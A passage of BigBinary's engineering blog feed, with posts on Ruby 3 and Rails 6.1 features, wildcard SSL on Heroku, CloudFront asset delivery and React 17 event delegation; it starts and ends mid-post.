ActionController::Parameters.new({&quot;firstName&quot;=&gt;&quot;oliver&quot;, &quot;lastName&quot;=&gt;&quot;smith&quot;, &quot;email&quot;=&gt;&quot;oliver@bigbinary.com&quot;})=&gt; &lt;ActionController::Parameters {&quot;firstName&quot;=&gt;&quot;oliver&quot;, &quot;lastName&quot;=&gt;&quot;smith&quot;, &quot;email&quot;=&gt;&quot;oliver@bigbinary.com&quot;} permitted: false&gt;# 2. Convert camelCase to snake_case using block parameterirb(rails)&gt; params.permit(:firstName, :lastName, :email).transform_keys(&amp;:underscore)=&gt; &lt;ActionController::Parameters {&quot;first_name&quot;=&gt;&quot;oliver&quot;, &quot;last_name&quot;=&gt;&quot;smith&quot;, &quot;email&quot;=&gt;&quot;oliver@bigbinary.com&quot;} permitted: true&gt;# 3. Or using hash argumentirb(rails)&gt; params.permit(:firstName, :lastName, :email).transform_keys({firstName: 'first_name', lastName: 'last_name'})=&gt; &lt;ActionController::Parameters {&quot;first_name&quot;=&gt;&quot;oliver&quot;, &quot;last_name&quot;=&gt;&quot;smith&quot;, &quot;email&quot;=&gt;&quot;oliver@bigbinary.com&quot;} permitted: true&gt;</code></pre><h5>Slicing hash along with key transformation</h5><pre><code class="language-ruby">irb(main)&gt; address.transform_keys({locality: :country}).slice(:house_no, :country)=&gt; {:house_no=&gt;123, :country=&gt;&quot;India&quot;}</code></pre><h5>Transforming keys in place using bang counterpart</h5><pre><code class="language-ruby">irb(main)&gt; address.transform_keys!({locality: :country}, &amp;:downcase)irb(main)&gt; address=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :country=&gt;&quot;India&quot;}</code></pre><h5>References</h5><ul><li>Discussions regarding this feature can be found<a href="https://bugs.ruby-lang.org/issues/16274?tab=history">here</a>.</li><li>Commit for this feature can be found<a href="https://github.com/ruby/ruby/commit/b25e27277dc39f25cfca4db8452d254f6cc8046e">here</a>.</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 raises an error for impossible camelcase inflections]]></title>
       <author><name>Yedhin Kizhakkethara</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-raises-error-for-impossible-camelcase-inflections"/>
      <updated>2020-12-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-raises-error-for-impossible-camelcase-inflections</id>
      <content type="html"><![CDATA[<p>From Rails 6.1 onwards, the default behaviorof the Rails generatorwhen encountering an impossible &quot;camelCase&quot; inflectionwould be to raise an error, rather than generatinga name that will cause problems.</p><h3>What are impossible &quot;camelCase&quot; inflections?</h3><p>The<a href="https://api.rubyonrails.org/classes/ActiveSupport/Inflector/Inflections.html">Rails Inflector</a>is part of the <code>ActiveSupport</code> module,and it comes shipped with patterns to transform Ruby strings.This library is responsible for pluralization and/or singularizationof strings.</p><p>The Inflector tries its best to provide the desired result givena string. But sometimes, with certain words, it can't provide saythe pluralized version out of the box.</p><p>Let's say for example the string is <code>DSL</code>.The desired plural form is <code>DSLs</code>.But the Inflector gets confused on what exactly isthe desired plural form or more accurately whatexactly is the underscore resource nameandit used to generate inconsistent class names.</p><h3>Before Rails 6.1</h3><p>Let's try out the following example.</p><pre><code class="language-bash">bundle exec rails g scaffold DSL field</code></pre><p>In the output we can see that the controller filenameis <code>ds_ls_controller.rb</code>andthe controller class name is:</p><pre><code class="language-ruby">class DsLsController &lt; ApplicationController</code></pre><p>And the routes file is populated with:</p><pre><code class="language-ruby">resources :dsls</code></pre><p>You see the problem right?</p><p>The generated route <code>:dsls</code>expects a <code>DslsController</code> controller but the controller generated is <code>DsLsController</code>.This will lead to a routing error.</p><h3>How Rails 6.1 solves this problem?</h3><p>The Rails team decided that it would be better toterminate the generation process with an errorrather than generating classes that are internally inconsistent.</p><p>Thus Rails now raises an error in the following two scenarioswhere the casing is impossible to be inflected:</p><p>The first case is when &quot;camelCased&quot; model name is passed to a generator.The second case is when the full round trip from pluralize to singularize does notmatch with the original singular value. Rails checks for the following condition.</p><pre><code class="language-ruby">name.pluralize.underscore.singularize != name.underscore.singularize</code></pre><p>We can try out the same example that we did in the previous sectionand it will provide the following output:</p><pre><code class="language-text">Rails cannot recover the underscored form from its camelcase form 'DSL'.Please use an underscored name instead, either 'dsl' or 'ds_l'.Or set up custom inflection rules for this noun before running the generator in config/initializers/inflections.rb.</code></pre><p>This allows the developers to either rephrase the resource namewith an underscored name from the very beginning itselforfollow the suggestion, that is to create a custom inflection.</p><h3>Creating a custom inflection</h3><p><code>ActiveSupport::Inflector</code> provides us with the <code>inflections</code> methodin order to create our own custom inflections.This method can even accept an optional locale,which comes in handy when we are writinginflection rules for languages other than <code>:en</code>,which is the default locale.</p><p>You can have a detailed look into the inflection methods over<a href="https://api.rubyonrails.org/classes/ActiveSupport/Inflector/Inflections.html">here</a>.</p><p>Let's try to make the above example workandget the desired underscore namefor the string <code>DSL</code>.Were dealing with an irregular inflection.Thus we can make use of the <code>irregular</code> method,which takes two arguments:the singular and the plural form of the word as strings.</p><p>Let's just add the custom inflection into<code>config/initializers/inflections.rb</code>:</p><pre><code class="language-ruby"># We provide the string in lowercase formatActiveSupport::Inflector.inflections(:en) do |inflect| inflect.irregular 'dsl', 'dsls'end</code></pre><p>Voila!That's it.</p><p>Now if we run <code>rails g scaffold DSL</code>,we will be able to get the correct file and class names.</p><p>Check out the<a href="https://github.com/rails/rails/pull/39832">pull request</a>and<a href="https://github.com/rails/rails/issues/39117">the issue</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 allows associations to be destroyed asynchronously]]></title>
       <author><name>Srijan Kapoor</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-allows-associations-to-support-destroy_async-option-with-dependent-key"/>
      <updated>2020-12-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-allows-associations-to-support-destroy_async-option-with-dependent-key</id>
      <content type="html"><![CDATA[<p>In Rails 6.1, Rails will enqueue a background job to destroy associated recordsif <code>dependent: :destroy_async</code> is setup.</p><p>Let's consider the following example.</p><pre><code class="language-ruby">class Team &lt; ApplicationRecord  has_many :players, dependent: :destroy_asyncendclass Player &lt; ApplicationRecord  belongs_to :teamend</code></pre><p>Now, if we call the <code>destroy</code> method on an instance of class <code>Team</code> Rails wouldenqueue an asynchronous job to delete the associated <code>players</code> records.</p><p>We can verify this asynchronous job with the following test case.</p><pre><code class="language-ruby">class TeamTest &lt; ActiveSupport::TestCase  include ActiveJob::TestHelper  test &quot;destroying a record destroys the associations using a background job&quot; do    team = Team.create!(name: &quot;Portugal&quot;, manager: &quot;Fernando Santos&quot;)    player1 = Player.new(name: &quot;Bernardo Silva&quot;)    player2 = Player.new(name: &quot;Diogo Jota&quot;)    team.players &lt;&lt; [player1, player2]    team.save!    team.destroy    assert_enqueued_jobs 1    assert_difference -&gt; { Player.count }, -2 do      perform_enqueued_jobs    end  endendFinished in 0.232213s, 4.3064 runs/s, 8.6128 assertions/s.1 runs, 2 assertions, 0 failures, 0 errors, 0 skips</code></pre><p>Alternatively, this enqueue behavior can also be demonstrated in<code>rails console</code>.</p><pre><code class="language-ruby">irb(main):011:0&gt; team.destroy  TRANSACTION (0.1ms)  begin transaction  Player Load (0.6ms)  SELECT &quot;players&quot;.* FROM &quot;players&quot; WHERE &quot;players&quot;.&quot;team_id&quot; = ?  [[&quot;team_id&quot;, 6]]Enqueued ActiveRecord::DestroyAssociationAsyncJob (Job ID: 4df07c2d-f55b-48c9-8c20-545b086adca2) to Async(active_record_destroy) with arguments: {:owner_model_name=&gt;&quot;Team&quot;, :owner_id=&gt;6, :association_class=&gt;&quot;Player&quot;, :association_ids=&gt;[1, 2], :association_primary_key_column=&gt;:id, :ensuring_owner_was_method=&gt;nil}Performed ActiveRecord::DestroyAssociationAsyncJob (Job ID: 4df07c2d-f55b-48c9-8c20-545b086adca2) from Async(active_record_destroy) in 34.5ms</code></pre><p>However, this behaviour is inconsistent and the <code>destroy_async</code> option shouldnot be used when the association is backed by foreign key constraints in thedatabase.</p><p>Let us consider another example.</p><p><strong>CASE:</strong> With a simple foreign key on the <code>team_id</code> column in place.</p><pre><code class="language-ruby">irb(main):015:0&gt; team.destroy  TRANSACTION (0.1ms)  begin transaction  Player Load (0.1ms)  SELECT &quot;players&quot;.* FROM &quot;players&quot; WHERE &quot;players&quot;.&quot;team_id&quot; = ?  [[&quot;team_id&quot;, 7]]Enqueued ActiveRecord::DestroyAssociationAsyncJob (Job ID: 69e51e5f-5b59-4095-92db-90aab73a7f65) to Async(default) with arguments: {:owner_model_name=&gt;&quot;Team&quot;, :owner_id=&gt;7, :association_class=&gt;&quot;Player&quot;, :association_ids=&gt;[1], :association_primary_key_column=&gt;:id, :ensuring_owner_was_method=&gt;nil}  Team Destroy (0.9ms)  DELETE FROM &quot;teams&quot; WHERE &quot;teams&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 7]]  TRANSACTION (1.1ms)  rollback transactionPerforming ActiveRecord::DestroyAssociationAsyncJob (Job ID: 69e51e5f-5b59-4095-92db-90aab73a7f65) from Async(default) enqueued at 2021-01-03T21:10:21Z with arguments: {:owner_model_name=&gt;&quot;Team&quot;, :owner_id=&gt;7, :association_class=&gt;&quot;Player&quot;, :association_ids=&gt;[1], :association_primary_key_column=&gt;:id, :ensuring_owner_was_method=&gt;nil}Traceback (most recent call last):        1: from (irb):15ActiveRecord::InvalidForeignKey (SQLite3::ConstraintException: FOREIGN KEY constraint failed)</code></pre><p>An exception is raised by Rails and the record is not destroyed.</p><p><strong>CASE:</strong> With a cascading foreign key using <code>on_delete: :cascade</code></p><p>Here, even though <code>ActiveRecord::DestroyAssociationAsyncJob</code> would run tosuccessful completion, the associated <code>players</code> records would already be deletedinside the same transaction block destroying the <code>team</code> record, and it wouldskip any destroy callbacks like <code>before_destroy</code>, <code>after_destroy</code> or<code>after_commit on: :destroy</code>.</p><p>This makes using <code>destroy_async</code> redundant in such a case.</p><p>Check out the <a href="https://github.com/rails/rails/pull/40157">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Setting up wild card SSL on heroku]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/wild-card-ssl-on-heroku"/>
      <updated>2020-12-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/wild-card-ssl-on-heroku</id>
      <content type="html"><![CDATA[<p>Setting up wild card SSL on heroku can be complicated. Recently I had to set itup for a new domain and this time I recorded the whole process.</p><p>The ssl certificate in this example was bought from namecheap but the sameprocess would apply for other vendors too.</p><p>The video of the whole process is available here.</p><p>&lt;iframewidth=&quot;100%&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/A6URYtDWZhg&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><h3>Script to generate keys</h3><pre><code class="language-bash">openssl req -new -newkey rsa:2048 -nodes -keyout server.key -out server.csr</code></pre><p>When the prompt asks for <code>Common name(full qualified host name)</code> then enter<code>*.yourdomainname.com</code>. Since we are setting up a wild card certificate it'simportant that the common name starts with a <code>*</code>. Otherwise later we are goingto get an error.</p><p>Except the above mentioned question the answer to other questions do not matterat all. You can enter junk values and the SSL will work just fine.</p><p>Hit enter when a challenge password is requested.</p><h3>Script to generate ssl bundle</h3><pre><code class="language-bash">$ cat __neetohelp_net.crt __neetohelp_net.ca-bundle &gt; ssl-bundle.crt</code></pre><p>Note that the order of the crt and bundle files matters when combining them.</p><p>Secondly, as shown in the video, we might have to split the combined line. Nowlet's examine the contents of the combined file.</p><pre><code class="language-bash">$ cat ssl-bundle.crt</code></pre><p>If we see a line like the one below:</p><pre><code class="language-plaintext">-----END CERTIFICATE----------BEGIN CERTIFICATE-----</code></pre><p>Then we need to split the line such that <code>END</code> and <code>BEG</code> align vertically likeso:</p><pre><code class="language-plaintext">-----END CERTIFICATE----------BEGIN CERTIFICATE-----</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Reduce asset delivery time from 30 to 3 seconds with CDN]]></title>
       <author><name>Vinay Chandran</name></author>
      <link href="https://www.bigbinary.com/blog/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds"/>
      <updated>2020-11-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds</id>
      <content type="html"><![CDATA[<p><a href="https://aceinvoice.com">AceInvoice</a>, one of BigBinary's products, was facinghigh page load times. AceInvoice is a React.js application, and the size of<code>application.js</code> has gone up to 689kB compressed. Folks from India wouldsometimes have to wait up to 30 whole seconds for the <code>application.js</code> to load.</p><p>AceInvoice is hosted at heroku. Heroku serves assets from a limited number ofservers in select locations. The farther you are from these servers, the higherthe latency of asset delivery. This is where a CDN like Cloudfront can help.</p><h2>How does Cloudfront work?</h2><p>Simply stated CDNs are like caches. CDNs caches recently viewed items and thenthese CDNs can access stuff from the cache at great speeds.</p><h5>Lets take a practical example</h5><ul><li>Create a Cloudfront distribution <code>aceinvoice.cloudfront.com</code> which points to<code>app.aceinvoice.com</code>.</li><li>The browser makes a request to <code>abc.cloudfront.com/images/peter.jpg</code> for thefirst time.</li><li>Cloudfront checks if it has anything cached against <code>/images/peter.jpg</code>. Sinceits the first time its encountering this URL it wont find anything, so itsa cache miss.</li><li>Cloudfront forwards this request back to the origin, which in this case is<code>app.aceinvoice.com/images/peter.jpg</code>. The browser gets back the image.</li><li>During this process, Cloudfront caches the resource. Think of it like akey-value pair where <code>/images/peter.jg</code> is the key and the actual image is thevalue.</li></ul><h5>Now let's consider another scenario</h5><ul><li>Another browser makes a request to the same resource.</li><li>Cloudfront checks for cached items for that particular path.</li><li>Cloudfront finds the cached resource. Its a cache hit!</li><li>Cloudfront directly serves the resource back to the browser without hittingthe origin server.</li></ul><h2>So how is this faster?</h2><p>Cloudfront has 100+ edge locations scattered around the world. There will alwaysbe an edge thats close to you. Cached resources are immediately made availablefrom all these edge locations. This reduces latency.</p><h2>What are the caveats?</h2><p>The biggest issue with using a CDN is properly invalidating caches. Letscontinue with the above example. If the <code>peter.jpg</code> file is updated, Cloudfrontis unaware of this change. Itll keep serving the old file whenever a request ismade to that path.</p><p>The easiest way to invalidate the cache is by using a hash in the asset namethat changes on deploy. Rails handles this by default. After deploying theapplication, the path to the aforementioned asset might be<code>images/Peter-5nbd44gfae.jpg</code>. When a request comes to this path, Cloudfrontcaches it and uses the cache for subsequent requests.</p><p>But on the next deploy, the path to the same asset changes. Since Cloudfrontdoesnt have anything cached for that URL, it will check the origin and get thelatest asset.</p><hr><h2>How to set up Cloudfront with Rails</h2><p>Rails makes it easy to set up an asset host. In the<code>config/environments/production.rb</code> file, add the following line.</p><pre><code class="language-ruby">config.action_controller.asset_host = ENV[CLOUDFRONT_ENDPOINT]</code></pre><p>By doing this, Rails will look for all the assets in Cloudfront.</p><p>Let's consider the <code>application.js</code> asset. In the main <code>.erb</code> file the <code>src</code> for<code>application.js</code> was <code>/packs/js/application.js</code>.</p><p>Once we make this change it will be<code>https://ENV[CLOUDFRONT_ENDPOINT]/packs/js/application.js</code>.</p><p>We will be setting the environment variable in Heroku shortly.</p><h5>Creating a Cloudfront distribution</h5><ol><li><p>Go to AWS Management Console -&gt; Cloudfront -&gt; Create Distribution Choose<em>Web</em> as the delivery method.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/delivery-method.png" alt="Setting delivery method"></p></li><li><p>In origin domain name, specify the path to your server. In this example it is<code>app.aceinvoice.com</code>. In origin protocol policy, choose <em>Match viewer</em> sothat the same protocol as the main request is used when Cloudfront forwardsrequests to the origin server. You can leave the other settings unchanged.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/origin-settings.png" alt="Origin settings"></p></li><li><p>In the cache behaviour settings, change viewer protocol policy to <em>RedirectHTTP to HTTPS</em>. You can leave the other settings untouched.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/cache-behavior.png" alt="Cache behavior"></p></li><li><p>At the bottom of the page switch the distribution state to <em>Enabled</em> andclick on <em>Create Distribution</em>.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/distribution-state.png" alt="Distribution state"></p></li><li><p>Note the <em>Domain name</em> of your distribution from the Cloudfront dashboard.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/cloudfront-dashboard.png" alt="Cloudfront dashboard"></p></li><li><p>In the Heroku dashboard add the environment variable in your app.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/heroku-env-variable.png" alt="Setting environment variable"></p></li></ol><h2>Result</h2><p>Serving time of <code>application.js</code> on a cold load (not cached in browser) droppedfrom 30 seconds to 2-3 seconds.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds values_at attribute method for Active Record]]></title>
       <author><name>Chetan Gawai</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-values_at-attribute-method-for-active-record"/>
      <updated>2020-11-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-values_at-attribute-method-for-active-record</id>
      <content type="html"><![CDATA[<p>Rails 6.1 simplifies retrieving values of attributes on the Active Record modelinstance by adding the <code>values_at</code> attribute method. This is similar to the<code>values_at</code> method in <code>Hash</code> and <code>Array</code>.</p><p>Let's check out an example of extracting values from a <code>User</code> model instance.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  def full_name    &quot;#{self.first_name} #{self.last_name}&quot;  endend &gt;&gt; user = User.new(first_name: 'Era', last_name: 'Das' , email: 'era@gmail.com')=&gt; User id: nil, first_name: &quot;Era&quot;, last_name: &quot;Das&quot;, created_at: nil, updated_at: nil, email: &quot;era@gmail.com&quot;, password_digest: nil</code></pre><h4>Before Rails 6.1</h4><p>As shown below using <code>values_at</code> for <code>full_name</code>, which is a method, returns<code>nil</code>.</p><pre><code class="language-ruby">&gt;&gt; user.attributes.values_at(&quot;first_name&quot;, &quot;full_name&quot;)=&gt; [&quot;Era&quot;, nil]</code></pre><h4>After changes in Rails 6.1</h4><p>Rails 6.1 added the <code>values_at</code> method on Active Record which returns an arraycontaining the values associated with the given methods.</p><pre><code class="language-ruby">&gt;&gt; user.values_at(&quot;first_name&quot;, &quot;full_name&quot;)=&gt; [&quot;Era&quot;, &quot;Era Das&quot;]</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/36481">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3 adds new method Hash#except]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-adds-new-method-hash-except"/>
      <updated>2020-11-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-adds-new-method-hash-except</id>
      <content type="html"><![CDATA[<p>Ruby 3 addsa new method, <code>except</code>, to the Hash class.<code>Hash#except</code> returns a hashexcluding the given keysandtheir values.</p><h3>Why do we need Hash#except?</h3><p>At times,we needto print or log everythingexcept some sensitive data.Let's saywe want to printuser detailsin the logsbut not passwords.</p><p>Before Ruby 3 we could have achievedit in the following ways:</p><pre><code class="language-ruby">irb(main):001:0&gt; user_details = { name: 'Akhil', age: 25, address: 'India', password: 'T:%g6R' }# 1. Reject with a block and include?irb(main):003:0&gt; puts user_details.reject { |key, _| key == :password }=&gt; { name: 'Akhil', age: 25, address: 'India' }# 2. Clone the hash with dup, tap into it and delete that key/value from the cloneirb(main):005:0&gt; puts user_details.dup.tap { |hash| hash.delete(:password) }=&gt; { name: 'Akhil', age: 25, address: 'India' }</code></pre><p>We know that ActiveSupport alreadycomes with <code>Hash#except</code>but for a simple Ruby applicationusing ActiveSupport wouldbe overkill.</p><h3>Ruby 3</h3><p>To make the above taskeasier and more explicit,Ruby 3 adds <code>Hash#except</code>to return a hashexcluding the given keys and their values:</p><pre><code class="language-ruby">irb(main):001:0&gt; user_details = { name: 'Akhil', age: 25, address: 'India', password: 'T:%g6R' }irb(main):002:0&gt; puts user_details.except(:password)=&gt; { name: 'Akhil', age: 25, address: 'India' }irb(main):003:0&gt; db_info = YAML.safe_load(File.read('./database.yml'))irb(main):004:0&gt; puts db_info.except(:username, :password)=&gt; { port: 5432, database_name: 'example_db_production' }</code></pre><p>Check out the<a href="https://github.com/ruby/ruby/commit/82ca8c73034b0a522fd2970ea39edfcd801955fe">commit</a>for more details.Discussion around it can be found <a href="https://bugs.ruby-lang.org/issues/15822">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Database tasks can skip test database using SKIP_TEST_DATABASE]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/database-tasks-can-skip_test_database-with-an-environment-variable"/>
      <updated>2020-10-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/database-tasks-can-skip_test_database-with-an-environment-variable</id>
      <content type="html"><![CDATA[<p>In Rails 6.1, Rails will skip modifications to the test database if<code>SKIP_TEST_DATABASE</code> is set to <code>true</code>.</p><h2>Without the environment variable</h2><pre><code class="language-bash">&gt; bundle exec rake db:createCreated database 'app_name_development'Created database 'app_name_test'</code></pre><h2>With the environment variable</h2><pre><code class="language-bash">&gt; SKIP_TEST_DATABASE=true bundle exec rake db:createCreated database 'app_name_development'</code></pre><p>As we can see in the first example, both a <code>development</code> and a <code>test</code> databasewere created, which is unexpected when directly invoking <code>db:create</code>. Oneobvious solution to this problem is to force the <code>development</code> environment toonly create a <code>development</code> database. However this solution will break<code>bin/setup</code> as mentioned in<a href="https://github.com/rails/rails/commit/6ca9031ba3c389f71366c3e6abf069c6924c5acf">this commit</a>.Hence the need for an environment variable to skip <code>test</code> database creation.</p><p>Check out the <a href="https://github.com/rails/rails/pull/39027">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 supports ORDER BY clause for batch processing methods]]></title>
       <author><name>Sagar Patil</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-supports-order-desc-for-find_each-find_in_batches-and-in_batches"/>
      <updated>2020-10-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-supports-order-desc-for-find_each-find_in_batches-and-in_batches</id>
      <content type="html"><![CDATA[<p>Before Rails 6.1, batch processing methods like <em>find_each</em>, <em>find_in_batches</em>and <em>in_batches</em> didn't support the <em>ORDER BY</em> clause. By default the order wasset to <em>id ASC</em>.</p><pre><code class="language-ruby">&gt; User.find_each{|user| puts user.inspect}User Load (0.4ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1000]]</code></pre><p>Rails 6.1 now supports <em>ORDER BY id</em> for ActiveRecord batch processing methodslike <em>find_each</em>, <em>find_in_batches</em>, and <em>in_batches</em>. This would allow us toretrieve the records in ascending or descending order of <em>ID</em>.</p><pre><code class="language-ruby">&gt; User.find_each(order: :desc){|user| puts user.inspect}User Load (0.4ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT ?  [[&quot;LIMIT&quot;, 1000]]</code></pre><pre><code class="language-ruby">&gt; User.find_in_batches(order: :desc) do |users|&gt;   users.each do |user|&gt;     puts user.inspect&gt;   end&gt; endUser Load (0.3ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT ?  [[&quot;LIMIT&quot;, 1000]]</code></pre><pre><code class="language-ruby">&gt; User.in_batches(order: :desc) do |users|&gt;   users.each do |user|&gt;     puts user.inspect&gt;   end&gt; end(0.2ms)  SELECT &quot;users&quot;.&quot;id&quot; FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT ?  [[&quot;LIMIT&quot;, 1000]]User Load (0.2ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 101]]</code></pre><p>Points to remember:</p><ul><li>The <em>ORDER BY</em> clause only works with the primary key column.</li><li>Valid values for the <em>ORDER BY</em> clause are <em>[:asc,:desc]</em> and it's casesensitive. If we use caps or title case (like <em>DESC</em> or <em>Asc</em>) then we'll getan <em>ArgumentError</em> as shown below.</li></ul><pre><code class="language-ruby">&gt; User.find_in_batches(order: :DESC) do |users|&gt;   users.each do |user|&gt;     puts user.inspect&gt;   end&gt; endTraceback (most recent call last):        2: from (irb):5        1: from (irb):6:in `rescue in irb_binding'ArgumentError (unknown keyword: :order)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/30590">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3 adds Symbol#name]]></title>
       <author><name>Datt Dongare</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-adds-symbol-name"/>
      <updated>2020-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-adds-symbol-name</id>
      <content type="html"><![CDATA[<p>All are excited aboutwhat <code>Ruby 3.0</code> hasto offer to the Ruby developers.There is already a lot of buzzthat the feature set of <code>Ruby 3.0</code>will change the perspective of developershow they look at <code>Ruby</code>.</p><p>One of the important aspects of <code>Ruby 3.0</code> is optimization.The part of that optimization isthe introduction of <code>name</code> method for <code>Symbol</code>.In this blog,we will take a lookat what <code>name</code> method of class <code>Symbol</code> doesandwhy it was introduced.The new <code>name</code> method is introduced on <code>Symbol</code>to simply convert a symbol into a string.<code>Symbol#name</code> returns a string.Let's see how it works.</p><pre><code class="language-ruby">irb(main):001:0&gt; :simba.name=&gt; 'simba'irb(main):002:0&gt; :simba.name.class=&gt; Stringirb(main):003:0&gt; :simba.name === :simba.name=&gt; true</code></pre><p>Wait what?Don't we have <code>to_s</code>to convert a symbol into a string.Most of us have used <code>to_s</code> method on a <code>Symbol</code>.The <code>to_s</code> method returns a <code>String</code> objectandwe can simply use it.But why <code>name</code>?</p><p>Using <code>to_s</code> is okay in most cases.But the problem with <code>to_s</code> isthat it creates a new <code>String</code> objectevery time we call it on a symbol.We can verify this in <code>irb</code>.</p><pre><code class="language-ruby">irb(main):023:0&gt; :simba.to_s.object_id=&gt; 260irb(main):024:0&gt; :simba.to_s.object_id=&gt; 280</code></pre><p>Creating a new object for every <code>symbol</code> to a <code>string</code> conversionallocates new memory which increases overhead.The light was thrown on this issue by<a href="https://bugs.ruby-lang.org/users/6346">schneems (Richard Schneeman)</a>in a talk at RubyConf Thailandwhere he showed how <code>Symbol#to_s</code> allocationcauses significant overhead in <code>ActiveRecord</code>.This inspired <code>Ruby</code> communityto have a new method <code>name</code> on <code>Symbol</code>which returns a <code>frozen string</code> object.This reduces the string allocations dramaticallywhich results in reducing overhead.</p><pre><code class="language-ruby">irb(main):001:0&gt; :simba.name.frozen?=&gt; trueirb(main):002:0&gt; :simba.name.object_id=&gt; 200irb(main):003:0&gt; :simba.name.object_id=&gt; 200</code></pre><p>The reasonto bring this feature wasthat most of the timeswe want a simple string representationfor displaying purposeorto interpolate into another string.The result of <code>to_s</code> is rarely mutated directly.By introducing this methodwe save a lot of objectswhich helps in optimization.Now we know the benefits of <code>name</code>,we should prefer using <code>name</code> over <code>to_s</code>when we don't want to mutate a string.</p><p>For more information on discussion,official documentation,please head on to <a href="https://bugs.ruby-lang.org/issues/16150">Feature #16150</a> discussion,<a href="https://github.com/ruby/ruby/pull/3514">Pull request</a>and<a href="https://www.ruby-lang.org/en/news/2020/09/25/ruby-3-0-0-preview1-released/">Ruby 3.0 official release preview</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[React 17 delegates events to root instead of document]]></title>
       <author><name>Chetan Gawai</name></author>
      <link href="https://www.bigbinary.com/blog/react-17-delegates-events-to-root-instead-of-document"/>
      <updated>2020-09-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-17-delegates-events-to-root-instead-of-document</id>
      <content type="html"><![CDATA[<p>React has been doing <a href="https://davidwalsh.name/event-delegate">event delegation</a>automatically since its first release. It attaches one handler per event typedirectly at the <code>document</code> node.</p><p>Though it improves the performance of an application,<a href="https://github.com/facebook/react/issues/13451">many</a><a href="https://github.com/facebook/react/issues/4335">issues</a><a href="https://github.com/facebook/react/pull/8117">have been</a><a href="https://github.com/facebook/react/issues/285#issuecomment-253502585">reported</a>due to the event delegation on the <code>document</code> node.</p><p>To demonstrate one of the issues let's take an example of a select dropdown.</p><p><code>CountryDropDown</code> in the below example is a React component for countryselection, which would be rendered to a div with id <code>react-root</code>. The react DOMcontainer is wrapped inside a div with id <code>main</code> that has a <code>change</code> eventcontaining <code>stopPropagation()</code>.</p><pre><code class="language-html">&lt;!--Div's change event contains stopPropagation()--&gt;&lt;div id=&quot;main&quot;&gt;  &lt;!--Div where react component will be rendered --&gt;  &lt;div id=&quot;react-root&quot;&gt;&lt;/div&gt;&lt;/div&gt;</code></pre><pre><code class="language-javascript">class CountryDropDown extends React.Component {  state = {    country: '',  }  const handleChange = e =&gt; {    this.setState({ country: e.target.value });  }  render() {    return (      &lt;table class=&quot;table table-striped table-condensed&quot;&gt;        &lt;thead&gt;          &lt;tr&gt;            &lt;th&gt;Country&lt;/th&gt;            &lt;th&gt;Selected country&lt;/th&gt;          &lt;/tr&gt;        &lt;/thead&gt;        &lt;tbody&gt;          